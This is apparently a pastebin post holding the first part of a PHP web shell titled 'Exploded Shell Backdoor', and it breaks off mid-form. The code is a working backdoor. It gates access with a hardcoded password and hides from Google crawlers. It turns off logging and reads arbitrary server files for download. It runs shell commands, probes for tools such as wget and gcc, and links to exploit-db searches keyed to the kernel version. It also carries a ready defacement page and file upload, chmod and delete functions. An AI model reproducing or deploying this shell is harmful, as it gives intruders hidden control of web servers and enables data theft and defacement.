· 5 years ago · Jul 21, 2020, 06:34 PM
1<?php
2@ini_set('output_buffering',0); //
3//@ini_set('display_errors', 0); //
4//@ini_set('error_reporting', 0); //
5/*
6#####################################################
7## Name : Exploded Shell Backdoor ##
8## Version : v1.5 Mini ##
9## Author : Muhammad Supiani a.k.a ./Port22 ##
10## Contact : Port22cyber@gmail.com ##
11## Report : Port22exploded@gmail.com ##
12## (c) 2015 www.security-exploded.orgs ##
13#####################################################
14*/
15$pass = "9e3e935b7a61f3faf5afd5d9082936db"; // Password Encrypted By MD5, pass is:" m1x "
16$title = "Security Exploded Shell Backdoor"; // Title
17$color = "grey"; // Color
18$background= "http://oi58.tinypic.com/2u8fmnn.jpg"; // Background
19$logo = "http://oi58.tinypic.com/10r33mq.jpg"; // Logo
20$music = ""; // Music, isi url music elu :v *cuman bisa didengerin di "about" :v , malas gw taroh di depan, soalnya kalok ada yg nggak suka :v
21$script_deface = "<html><head><title>Hacked By ./Port22</title></head><body>Hacked by ./Port22 <br> Crew's : Milton | Aris Dot ID | ./r00t_NTx | ./Port22 | MyMind404 | ./KriZ | ./BlackJoker |<embed src='http://www.youtube.com/v/qD8OnPC1fLI&autoplay=1&loop=1' type='application/x-shockwave-flash' wmode='transparent' width='0' height='0'></embed>"; //Script Deface. (html, php, txt)
22
23/*
24Content is encrypted by gzdeflate , base64 , and others . if you want the source code , please use the tool "PHP Decrypter". In case you dont trust me :-P
25*/
26
27$xName = "Security Exploded";
28$versi = "v1.5 Mini"; // Shell Version
29$default_action = 'FilesMan';
30@define('SELF_PATH', __FILE__);
31if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
32 header('HTTP/1.0 404 Not Found');
33 exit; }
34@session_start();
35@error_reporting(0);
36@ini_set('error_log',NULL);
37@ini_set('log_errors',0);
38@ini_set('max_execution_time',0);
39@ini_set('output_buffering',0);
40@ini_set('display_errors', 0);
41@set_time_limit(0);
42@set_magic_quotes_runtime(0);
43@define('VERSION', '2.1');
44if( get_magic_quotes_gpc() ) {
45 function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
46 $_POST = stripslashes_array($_POST);
47}
48function printLogin() {
49?><html><head>
50<link rel="SHORTCUT ICON" href="http://oi58.tinypic.com/10r33mq.jpg">
51<title>Security Exploded</title>
52</head>
53<body>
54<style type="text/css">
55body { background-color:transparan;background:#000;background-image: url("http://oi60.tinypic.com/in74pi.jpg");background-position: center; background-attachment: fixed;background-repeat: repeat; }
56.tabnez{ margin:30px auto 0 auto;border: 1px solid #333333; color: grey;
57-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;}
58body,td,th {font-family: Verdana;font-size: 12px;color: grey;font-weight: bold;}
59input {BORDER-RIGHT:grey 1px solid;BORDER-TOP:grey 1px solid;BORDER-LEFT:grey 1px solid;BORDER-BOTTOM: grey 1px solid;BACKGROUND-COLOR: #111111;COLOR: grey;font: 8pt Verdana;}
60</style><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style>
61
62<img src="http://oi58.tinypic.com/2u8fmnn.jpg" title="./Port22" style="float:left" alt="Exploded" height='250' width='700'/>
63<br><br><br><br><br><br><br><br><br><center>
64<table>
65<form method='post'>
66<tr>
67<td><img src='http://oi58.tinypic.com/10r33mq.jpg' class="tabnez" height='20' width='24'></td>
68<td><input class="tabnez" type="password" name="pass" placeholder="Password"></td>
69<td><input class="tabnez" type="submit" value="Login !"></td>
70</tr>
71</form>
72</table>
73</body>
74</html>
75 <?php break ;
76 exit;
77}
78if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
79 if( empty( $pass ) ||
80 ( isset( $_POST['pass']) && ( md5($_POST['pass']) == $pass ) ) )
81 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
82 else
83 printLogin();
84
85@ini_set('log_errors',0);
86@ini_set('display_errors',0);
87@ini_set('output_buffering',0);
88@ini_set('file_uploads',1);
89if(isset($_GET['dl']) && ($_GET['dl'] != "")){
90 $file = $_GET['dl'];
91 $filez = @file_get_contents($file);
92 header("Content-type: application/octet-stream");
93 header("Content-length: ".strlen($filez));
94 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
95 echo $filez;
96 exit;
97}
98elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
99 $file = $_GET['dlgzip'];
100 $filez = gzencode(@file_get_contents($file));
101 header("Content-Type:application/x-gzip\n");
102 header("Content-length: ".strlen($filez));
103 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
104 echo $filez;
105 exit;
106}
107// view image
108if(isset($_GET['img'])){
109 @ob_clean();
110 $d = magicboom($_GET['y']);
111 $f = $_GET['img'];
112 $inf = @getimagesize($d.$f);
113 $ext = explode($f,".");
114 $ext = $ext[count($ext)-1];
115 @header("Content-type: ".$inf["mime"]);
116 @header("Cache-control: public");
117 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
118 @header("Cache-control: max-age=".(60*60*24*7));
119 @readfile($d.$f);
120 exit;
121}
122//php info
123$phpinfo = "?&x=phpinfo";
124// Server software
125
126$software = getenv("SERVER_SOFTWARE");
127// CMD
128$cmdbox = "help";
129// Server Port
130$serverport = $_SERVER["SERVER_PORT"];
131// Backdoor Name
132$backdoor_name = "$title ";
133// check safemode
134if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
135// uname -a
136$system = @php_uname();
137// detector
138function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#ff0000'>OFF</font></b>";}}
139function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
140function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
141function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
142function testoracle() { if (function_exists('ocilogon')) {return showstat("on"); }else {return showstat("off"); }}
143function testmssql() { if (function_exists('mssql_connect')) {return showstat("on"); }else {return showstat("off"); }}
144function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
145function testpython() {if (exe('python -h')) {return showstat("on");}else {return showstat("off");}}
146function testruby() {if (exe('ruby -h')) {return showstat("on");}else {return showstat("off");}}
147function testgcc() {if (exe('gcc --help')) {return showstat("on");}else {return showstat("off");}}
148function testjava() {if (exe('java -h')) {return showstat("on");}else {return showstat("off");}}
149// check os
150if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
151else $win = FALSE;
152// change directory
153if(isset($_GET['y'])){
154 if(@is_dir($_GET['view'])){
155 $pwd = $_GET['view'];
156 @chdir($pwd);
157 }
158 else{
159 $pwd = $_GET['y'];
160 @chdir($pwd);
161 }
162}
163//hdd
164function convertByte($s) {
165if($s<=0) return 0;
166 $w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
167 $e = floor(log($s)/log(1024));
168 return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
169}
170//
171
172// username, id, shell prompt and working directory
173if(!$win){
174 if(!$user = rapih(exe("whoami"))) $user = "";
175 if(!$id = rapih(exe("id"))) $id = "";
176 $prompt = $user." \$ ";
177 $pwd = @getcwd().DIRECTORY_SEPARATOR;
178}
179else {
180 $user = @get_current_user();
181 $id = $user;
182 $prompt = $user." >";
183 $pwd = realpath(".")."\\";
184 // find drive letters
185 $v = explode("\\",$d);
186 $v = $v[0];
187 foreach (range("A","Z") as $letter)
188 {
189 $bool = @is_dir($letter.":\\");
190 if ($bool)
191 {
192 $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
193 if ($letter.":" != $v) {$letters .= $letter;}
194 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
195 $letters .= " </a>] ";
196 }
197 }
198}
199
200function getrealip(){
201if (!empty($_SERVER['HTTP_CLIENT_IP']))
202{ $ip=$_SERVER['HTTP_CLIENT_IP'];
203}elseif (!empty($SERVER['HTTP_X_FORWARDED_FOR']))
204//TO CHEK IP IS PASS FROM PROXY
205{ $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
206}else { $ip=$_SERVER['REMOTE_ADDR'];
207}
208return $ip;
209}
210
211 function showdisablefunctions() {
212 if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#ff0000'><b>".$disablefunc."</b></span>"; }
213 else { return "<span style='color:#00FF00'><b>NONE</b></span>"; }
214 }
215
216if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
217else $posix = FALSE;
218// server ip
219$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
220// your ip ;-)
221$my_ip = $_SERVER['REMOTE_ADDR'];
222$admin_id=$_SERVER['SERVER_ADMIN'];
223$bindport = "13123";
224$bindport_pass = "exploded";
225// Security Exploded
226$uplink = "http://www.security-exploded.org/search/label/Exploded Shell Backdoor";
227//wilworm
228$release = @php_uname('r');
229 $kernel = @php_uname('s');
230 $millink='http://milw0rm.com/search.php?dong=';
231
232 if( strpos('Linux', $kernel) !== false )
233 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
234 else
235 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
236 if(!function_exists('posix_getegid')) {
237 $user = @get_current_user();
238 $uid = @getmyuid();
239 $gid = @getmygid();
240 $group = "?";
241 } else {
242 $uid = @posix_getpwuid(@posix_geteuid());
243 $gid = @posix_getgrgid(@posix_getegid());
244 $user = $uid['name'];
245 $uid = $uid['uid'];
246 $group = $gid['name'];
247 $gid = $gid['gid'];
248 }
249 // Exploit-db
250 $release = @php_uname('r');
251 $kernel = @php_uname('s');
252 $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
253
254 if( strpos('Linux', $kernel) !== false )
255 $explink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
256 else
257 $explink .= urlencode( $kernel . ' ' . substr($release,0,3) );
258 if(!function_exists('posix_getegid')) {
259 $user = @get_current_user();
260 $uid = @getmyuid();
261 $gid = @getmygid();
262 $group = "?";
263 } else {
264 $uid = @posix_getpwuid(@posix_geteuid());
265 $gid = @posix_getgrgid(@posix_getegid());
266 $user = $uid['name'];
267 $uid = $uid['uid'];
268 $group = $gid['name'];
269 $gid = $gid['gid'];
270 }
271// separate the working direcotory
272$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
273$pwdurl = "";
274for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
275 $pathz = "";
276 for($j = 0 ; $j <= $i ; $j++){
277 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
278 }
279 $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
280}
281
282// Rename file or folder
283if(isset($_POST['Rename'])){
284 $old = $_POST['oldname'];
285 $new = $_POST['newname'];
286 @Rename($pwd.$old,$pwd.$new);
287 $file = $pwd.$new;
288}
289if(isset($_POST['uploadcompt'])){
290 if(is_uploaded_file($_FILES['file']['tmp_name'])){
291 $path = magicboom($_POST['path']);
292 $fname = $_FILES['file']['name'];
293 $tmp_name = $_FILES['file']['tmp_name'];
294 $pindah = $path.$fname;
295 $stat = @move_uploaded_file($tmp_name,$pindah);}
296 }
297
298if( $_POST['_upl'] == "Upload" ) {
299if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; }
300else { echo ''; }
301}
302if(isset($_POST['Chmod'])){
303 $name = $_POST['name'];
304 $value = $_POST['newvalue'];
305if (strlen($value)==3){
306 $value = 0 . "" . $value;}
307 @Chmod($pwd.$name,octdec($value));
308 $file = $pwd.$name;}
309if(isset($_POST['Chmod_folder'])){
310 $name = $_POST['name'];
311 $value = $_POST['newvalue'];
312if (strlen($value)==3){
313 $value = 0 . "" . $value;}
314 @Chmod($pwd.$name,octdec($value));
315 $file = $pwd.$name;}
316
317//////////////////////////////////
318// print useful info
319
320$buff = "Shell Backdoor : <b><font style='color:$color'> $backdoor_name $versi</font><b> <span class=\"gaya\"></a></b></b></font><b><span class=\"gaya\"> | </span><a href='$uplink' title='Search Shell Backdoor From Security Exploded' target='_blank'><font style='color:#ff0000'>[ Security Exploded ]</a></b></font><br>Version : <b><font style='color:$color'>".$versi."</font></a></b><br> Software : <b>".$software."</b><br />";
321$buff .= "System OS : <b>".$system." | <a href='http://www.google.com/search?q=".urlencode(@php_uname())."' title='Search System OS From Google' target='_blank'><font style='color:#ff0000'>[ Google ]</font></a> | <a href='".$millink."' title='Search Karnel From Milw0rm' target=_blank><font style='color:#ff0000'>[ Milw0rm ]</font></a> | <a href='".$explink."' title='Search Karnel From Exploit-db' target=_blank><font style='color:#ff0000'>[ Exploit-db ]</font></a></b><br />";
322if($id != "") $buff .= "ID : <b>".$id."</b><br />";
323$buff .= "PHP Version : <b>".phpversion()."</b> ON <b>".php_sapi_name()."<span class=\"gaya\"> | </span><a href='$phpinfo' title='PHP Info'><font style='color:#ff0000'>[ PHP Info ]</font></a> </b><br />";
324$buff .= "Server IP : <b><font style='color:#ff0000'>".$server_ip."</font></b> <span class=\"gaya\"> | </span> Port Server : <b><font style='color:#ff0000'>".$serverport."</font></b><span class=\"gaya\"> | </span> Your IP Surving : <b><a href='http://www.dnsstuff.com/tools?runFromMain=".getrealip()."&toolType=traceroute' title='Traceroute Your IP' target='_blank'><font style='color:#ff0000'>".getrealip()."<font></a></b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
325$buff .= "Free Disk: <font style='color:#ff0000'><b>".convertByte(disk_free_space("/"))." <span class=\"gaya\"> / </span> ".convertByte(disk_total_space("/"))."</b></font></span><br />";
326if($safemode) $buff .= "Safemode: <span class=\"gaya\"><font style='color:#ff0000'><b>ON</b></font></span><br />";
327else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
328$buff .= "Disable Functions: ".showdisablefunctions()."<br />";
329$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | Python: ".testpython()." | Ruby: ".testruby()." | Java: ".testjava()." | GCC: ".testgcc()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
330$buff .="<font color=00ff00 >Drive : <b>".$letters." > ".$pwdurl."</b></font>";
331
332
333 function rapih($text){
334 return trim(str_replace("<br />","",$text));
335}
336
337function magicboom($text){
338 if (!get_magic_quotes_gpc()) {
339 return $text;
340 }
341 return stripslashes($text);
342}
343
344function showdir($pwd,$prompt){
345 $fname = array();
346 $dname = array();
347 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
348 else $posix = FALSE;
349 $user = "????:????";
350 if($dh = @scandir($pwd)){
351 foreach($dh as $file){
352 if(is_dir($file)){
353 $dname[] = $file;
354 }
355 elseif(is_file($file)){
356 $fname[] = $file;
357 }
358 }
359 }
360 else{
361 if($dh = @opendir($pwd)){
362 while($file = @readdir($dh)){
363 if(@is_dir($file)){
364 $dname[] = $file;
365 }
366 elseif(@is_file($file)){
367 $fname[] = $file;
368 }
369 }
370 @closedir($dh);
371 }
372 }
373 sort($fname);
374 sort($dname);
375 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
376 $tree = @sizeof($path);
377 $parent = "";
378 $buff = "<center>
379 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
380 <table class=\"cmdbox\" style=\"width:45%;\">
381 <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=help /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
382 </form>
383 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
384 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
385 <tr><td><b>View </b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr></center>
386
387 </form></table><br><table class=\"explore\">
388 <tr><th>Name</th><th style=\"width:80px;\">Size</th><th style=\"width:210px;\">Owner:Group</th><th style=\"width:80px;\">Perms</th><th style=\"width:110px;\">Modified</th><th style=\"width:190px;\">Actions</th></tr>
389 ";
390 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
391 else $parent = $pwd;
392
393 foreach($dname as $folder){
394 if($folder == ".") {
395 if(!$win && $posix){
396 $name=@posix_getpwuid(@fileowner($folder));
397 $group=@posix_getgrgid(@filegroup($folder));
398 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
399 }
400 else {
401 $owner = $user;
402 }
403 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>-</td>
404 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
405 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
406 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">New Folder</a> | <a href=\"javascript:tukar('titik1','titik4_form');\">Upload</a></span>
407 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
408 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
409 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
410 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
411 </form>
412 <form action=\"\" id=\"titik4_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
413 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
414 <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
415 <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
416 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
417 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
418 </form></td>
419
420 </tr>
421 ";
422 }
423 elseif($folder == "..") {
424 if(!$win && $posix){
425 $name=@posix_getpwuid(@fileowner($folder));
426 $group=@posix_getgrgid(@filegroup($folder));
427 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
428 }
429 else {
430 $owner = $user;
431 }
432 $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-</td>
433 <td style=\"text-align:center;\">".$owner."</td>
434 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
435 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">New Folder</a> | <a href=\"javascript:tukar('titik2','titik3_form');\">Upload</a></span>
436 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
437 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
438 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
439 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
440 </form>
441 <form action=\"\" id=\"titik3_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
442 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
443 <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
444 <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
445 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
446 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
447 </form>
448 </td></tr>";
449 }
450 else {
451 if(!$win && $posix){
452 $name=@posix_getpwuid(@fileowner($folder));
453 $group=@posix_getgrgid(@filegroup($folder));
454 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
455 }
456 else {
457 $owner = $user;
458 }
459 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
460 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
461 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
462 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
463 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
464 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
465 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
466 <td><center>
467 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
468 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
469 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
470 <input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
471 <input class=\"inputzbut\" type=\"submit\" name=\"Chmod_folder\" value=\"Chmod\" />
472 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
473 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
474 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
475 <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">Rename</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\">Upload</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">Delete</a></span>
476 <form action=\"\" id=\"".clearspace($folder)."_form4\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
477 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
478 <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
479 <input class=\"inputz\" name=\"path\" type=\"text\" size=\"33\" value=\"".$pwd.$folder.DIRECTORY_SEPARATOR."\" /><br>
480 <input class=\"inputzbut\" name=\"uploadcompt\" type=\"submit\" value=\"Upload\"/>
481 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
482 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\" />
483 </form>
484 </td></tr>";
485 }
486 }
487
488 foreach($fname as $file){
489 $full = $pwd.$file;
490 if(!$win && $posix){
491 $name=@posix_getpwuid(@fileowner($folder));
492 $group=@posix_getgrgid(@filegroup($folder));
493 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
494 }
495 else {
496 $owner = $user;
497 }
498 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
499 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
500 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
501 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
502 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
503 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
504 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
505 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
506 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
507<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
508<input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
509<input class=\"inputzbut\" type=\"submit\" name=\"Chmod\" value=\"Chmod\" />
